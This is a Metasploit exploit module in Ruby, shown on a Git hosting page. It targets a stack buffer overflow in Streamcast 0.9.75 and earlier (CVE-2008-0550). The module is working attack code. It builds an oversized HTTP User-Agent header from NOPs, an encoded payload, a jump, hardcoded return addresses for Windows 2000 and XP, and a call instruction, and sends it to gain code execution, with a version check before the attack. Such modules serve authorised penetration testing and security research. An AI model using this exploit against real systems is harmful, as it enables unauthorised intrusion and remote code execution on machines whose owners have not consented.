adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4bd14ed5eae1961ba43f790bbc92c99c19b2c10e
metasploit-gs/modules/exploits/windows/http/steamcast_useragent.rb
T
HD Moore 6e80481384 Fix bad use of sock.get() and check() implementations 
Many of these modules uses sock.get() when they meant get_once()
and their HTTP-based checks were broken in some form. The response
to the sock.get() was not being checked against nil, which would
lead to stack traces when the service did not reply (a likely
case given how malformed the HTTP requests were).
2014-06-28 16:05:05 -05:00

89 lines
2.5 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Streamcast HTTP User-Agent Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending
an overly long User-Agent in an HTTP GET request, an attacker may be able to
execute arbitrary code.
},
'Author' => [
'LSO <lso[at]hushmail.com>', # Original exploit module
'patrick' # Added references and check code. Default target to XP.
],
'License' => BSD_LICENSE,
'References' =>
[
[ 'CVE', '2008-0550' ],
[ 'OSVDB', '42670' ],
[ 'URL', 'http://aluigi.altervista.org/adv/steamcazz-adv.txt'],
[ 'BID', '33898' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK by patrick 20090225
[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
],
'DisclosureDate' => 'Jan 24 2008',
'DefaultTarget' => 1))
register_options([ Opt::RPORT(8000) ], self)
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
res = sock.get_once
disconnect
if (res.to_s =~ /Steamcast\/0\.9\.75/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
juju = "GET / HTTP/1.0\r\n"
juju << "User-Agent: " + make_nops(1008 - payload.encoded.length)
juju << payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
juju << [ target.ret ].pack('V') + [0xe8, -850].pack('CV')
juju << rand_text_alpha_upper(275)
print_status("Trying target #{target.name}...")
sock.put(juju + "\r\n\r\n")
handler
disconnect
end
end
Reference in New Issue View Git Blame Copy Permalink